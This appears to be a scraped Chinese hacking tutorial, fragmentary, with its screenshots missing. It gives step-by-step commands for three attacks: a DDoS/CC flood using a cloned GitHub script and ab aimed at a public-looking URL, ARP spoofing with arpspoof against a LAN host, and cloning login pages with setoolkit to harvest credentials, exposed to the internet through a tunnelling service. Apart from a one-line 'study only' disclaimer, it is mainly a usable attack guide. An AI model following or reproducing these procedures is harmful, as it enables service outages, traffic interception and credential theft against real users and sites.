1.1 DDos攻击
git clone https://github.com/Andysun06/ddos
cd ddos
python ddos-p2.py
然后会出现如下界面
然后输入攻击对象的IP本教程以我的网站为例
再打开一个命令行窗口
ping + 域名
4. 配置参数
按下回车出现如下界面表示攻击成功
ab -n 参数1 -c 参数2 网站地址
参数一是并发数请求的用户量 参数二是发送总量请求的总次数 &有兴趣的可以在百度上另外学习 参数参数2和网站地址由自己设置这里以 10001000http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例 出现如下界面表示攻击成功
DDos与CC攻击区别 1CC攻击流量不大真实IP 通常是应用层攻击攻击对象是网页涉及的协议主要是HTTP,HTTPS消耗的是服务器的CPU资源通过请求大量调用CPU的资源例如查询数据库DDOS攻击流量很大伪造IP通常是网络层和传输层;攻击对象是IP涉及协议主要是IP
首先ARP欺骗需要用到dsniff数据包;arpspoof 是 dsniff 的一个附属工具所以我们需要安装的是 dsni安装命令如下
apt-get install dsniff -y
ifconfig
3. 嗅探ip设备
嗅探你所在WLAN下所有设备的IP地址命令如下
fping -g 本机IP地址/24
例如我的IP是192.168.145.98&命令就是fping -g 192.168.145.98/24
我的另一台设备就出现在了这里192.168.145.26&是一台PCcentos 4. 发起攻击
发起攻击之前先查看我192.168.145.26 08;目标主机09;的网速
结果基本耗时在50ms左右
输入命令发起攻击
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
网卡名称的查看上文已经提过我以我的网卡为例名称是eth0攻击目标就是我的另一台PCIP是192.168.145.26
因为我用的是虚拟机并且我PC的网关配置的是192.168.145.2因此我攻击命令 如下08;一般来说网关配置为xxx.xxx.xxx.1,也就是ip最后一位改为109
arpspoof -i eth0 -t 192.168.145.26 192.168.145.2
按下回车发起攻击出现如下页面表示攻击成功
如果你想停止攻击就按下Ctrl+Z攻击就停止了。
钓鱼网站是黑客常用的用于盗取目标用户名与账号的方式 今天主要介绍setoolkit来制作钓鱼网站
setoolkit是kali下的社会工程学工具集。
命令行输入
setoolkit
社会工程学攻击 快速追踪测试 第三方模块 升级软件 升级配置 帮助123456
鱼叉式网络攻击 网页攻击 传染媒介式 建立payload和listener 邮件群发攻击 Arduino基础攻击 无线接入点攻击 二维码攻击 Powershell攻击 第三反方模块12345678910
Java applet攻击 Metasploit浏览器攻击 钓鱼网站攻击 标签钓鱼攻击 网站jacking攻击 多种网站攻击 全屏幕攻击1234567
网站模板 站点克隆 用自己的网站123
如果选择网站模板的话会有几个默认的登陆界面的模板
如果想克隆指定的页面的话就选择2站点克隆当然这个功能虽然强大;但是有的网站是无法克隆的如果无法克隆就选择自己制作一样的网站去钓鱼。这里我详细讲一下站点克隆的方法。
登录页面模板
选择完2之后;需要我们输入一些信息
这个是我们克隆完之后的网站返回的ip地址一般就写虚拟机的IP地址
这个是我们克隆完之后的网站返回的ip地址一般就写虚拟机的IP地址
然后我们需要填写想要克隆的网站的url
回车之后;显示如下信息就代表克隆完成
我们将账号和密码都设为admin点击登陆发现有跳转到了真正的页面;也不会返回账号信息错误的界面同时kali也将我们输入的信息截获了 并在终端显示
本次使用DVWA的登录页面试验 内网穿透工具选择花生壳
所以这里就只需要我们将kali的IP以及端口(80)填入即可映射到外网
但是前面也说过http协议是收费的6块但是能用很久个人觉得倒是不贵。
好那现在就让我们去到最后一步用Custom Import和花生壳去 钓 鱼
注意:本文仅供学习之用严禁做违法之事
资料 一、DVWA& 链接https://pan.baidu.com/s/1ketwjg_wm5DSvCFNb20K2A 提取码sljb
①. 打开终端输入setoolkit ②. 选择1社会工程学攻击 ③. 选择2,网站攻击 ④,选择3,钓鱼网站 ⑤,选择3,用户导入【默认,回车即可】 ⑥,选择导入的路径【/root/dvwa】 ⑦,选择2,导入整个文件夹 ⑧,配置内网穿透 ⑨,通过域名访问,查看kali监听结果
选择3用户导入之后会出现如下页面如果是默认;直接回车即可 如果默认就直接回车。如果选择域名就需要将域名解析到该主机, 我们默认直接回车
下面我们选择导入整个文件夹
3. 配置内网穿透服务
4. 测试结果
输入网址访问https://****.****.fun/
如果想要实现公网钓鱼参照⑥即可
1. setoolkit 2. 输入1 3. 输入2 4. 输入3 5. 输入2 6. 输入kali虚拟机ip或自己搭建的kali的i09; 7. 输入克隆的网站地址 8. 通过kali的ip访问克隆网站地址